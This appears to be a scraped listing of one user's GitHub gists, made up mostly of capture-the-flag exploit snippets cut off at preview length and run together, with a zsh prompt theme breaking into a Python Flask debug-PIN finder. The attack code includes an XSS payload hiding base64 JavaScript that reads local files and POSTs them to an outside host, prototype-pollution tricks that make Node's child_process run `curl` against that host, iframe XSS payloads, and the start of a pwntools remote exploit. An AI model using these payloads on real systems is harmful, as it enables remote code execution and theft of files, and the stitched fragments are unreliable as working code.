@po6ix
po6ix / ex.py
Created April 14, 2020 02:52
flask secret pin finder
import hashlib
from itertools import chain
probably_public_bits = [
'flaskweb',
'flask.app',
'Flask',
'/usr/local/lib/python3.7/site-packages/flask/app.py',
]
private_bits = [
PROMPT="%(!.%{$fg_bold[red]%}#.%{$fg_bold[green]%}\$)%{$reset_color%} "
RPS1='%{$fg[blue]%}%~$(git_prompt_info)%{$reset_color%} '
ZSH_THEME_GIT_PROMPT_PREFIX="%{$fg[yellow]%}("
ZSH_THEME_GIT_PROMPT_SUFFIX=")%{$reset_color%}"
ZSH_THEME_GIT_PROMPT_CLEAN=""
@po6ix
po6ix / url
Created June 8, 2020 10:22
sol. Highlighter
http://highlighter.ctf.defenit.kr/read?id=1#({})['__proto__']['__defineGetter__']('a',function(){return('\x3cstyle\x3e\x3cstyle/\x3e\x3cscript/src=https://accounts.google.com/o/oauth2/revoke?callback=eval(atob(/ZnVuY3Rpb24gZmV0Y2hMb2NhbFJlc291cmNlKHVybCkgeyAgICAgICAgCiAgICBjb25zdCByZXEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsgICAgCiAgICByZXEub25sb2FkID0gZnVuY3Rpb24oKSB7CiAgICAgICAgY29uc3QgdGV4dCA9IHJlcS5yZXNwb25zZVRleHQ7ICAKICAgICAgICBmZXRjaCgnaHR0cDovL3A2LmlzOjg4ODgnLCB7Im1ldGhvZCI6ICJQT1NUIiwgImJvZHkiOiBlbmNvZGVVUkkodGV4dCl9KTsKICAgIH07ICAgIAogICAgcmVxLm9wZW4oJ0dFVCcsIHVybCk7CiAgICByZXEuc2VuZCgpOwp9OwoKZmV0Y2hMb2NhbFJlc291cmNlKCdmaWxlOi8vLycp/.source))\x3e\x3c/script\x3e');})
@po6ix
po6ix / README.md
Last active July 13, 2020 01:05
tsgctf-note1

Note 1

There was a simple unintended solution, so we could solve this challenge with time-based regex injection.

The challenge page includes the note create and delete function and ...

  • with location.hash, we can set the src attribute of an img tag
  • with location.search, we can construct a regex for filtering notes by their content (see below)
@po6ix
po6ix / 1.js
Created August 17, 2020 06:26
1.js
const child_process = require('child_process');
Object.prototype.BASH_ENV = '`curl http://p6.is`';
Object.prototype.shell = 'bash';
child_process.execSync('env');
@po6ix
po6ix / 2.js
Created August 17, 2020 06:28
2.js
const child_process = require('child_process');
Object.prototype.RAKEOPT = '-e "print `curl p6.is`"';
Object.prototype.shell = 'rake';
child_process.execSync('env');
<script>
x = `
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.location.hash=top.document.body.innerHTML.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.location.hash=top.document.body.innerHTML.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.location.hash=top.document.body.innerHTML.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.location.hash=top.document.body.innerHTML.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.location.hash=top.document.body.innerHTML.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.location.hash=top.document.body.innerHTML.valueOf ><\/script>'></iframe>
@po6ix
po6ix / blacklist.py
Created August 30, 2020 17:03
Fword CTF
from pwn import *
context.arch = 'amd64'
# p = process('./blacklist')
p = remote('blacklist.fword.wtf', 1236)
e = ELF('./blacklist')
mprotect = 0x448CF0
read = 0x447D30
@po6ix
po6ix / graphviz++
Last active September 6, 2020 13:23
2020 InterKosenCTF Writeups
digraph g1 {
subgraph cluster_0 {
style=filled;
color=lightgrey;
node [style=filled, color=white];
a0 -> a1 -> a2 -> a3;
}
start -> a0;
a3 -> end;
a1 -> b3;
function WeakMap(...e) {
return {
set: (...e)=>{
console.log(e)
},
has: () => {
console.log(87)
return 1;
}
}